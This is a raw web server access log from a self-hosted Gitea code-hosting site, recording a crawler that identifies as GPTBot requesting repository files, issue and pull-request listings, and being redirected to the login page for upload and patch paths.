"/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:17:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fcmake_install.cmake" [Client 74.7.227.38] [Length 24205] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fold_controller.hpp" [Client 74.7.227.38] [Length 20735] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" -[17/Feb/2026:17:29:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15346] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:17:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11342] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:17:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11117] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:17:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11342] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11342] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:17:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11312] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12138] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12181] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21639] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:30:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" -[17/Feb/2026:17:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp" -[17/Feb/2026:17:30:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:30:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" -[17/Feb/2026:17:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/.vscode" -[17/Feb/2026:17:30:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" -[17/Feb/2026:17:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/.vscode" -[17/Feb/2026:17:30:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" -[17/Feb/2026:17:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build" -[17/Feb/2026:17:30:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" -[17/Feb/2026:17:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 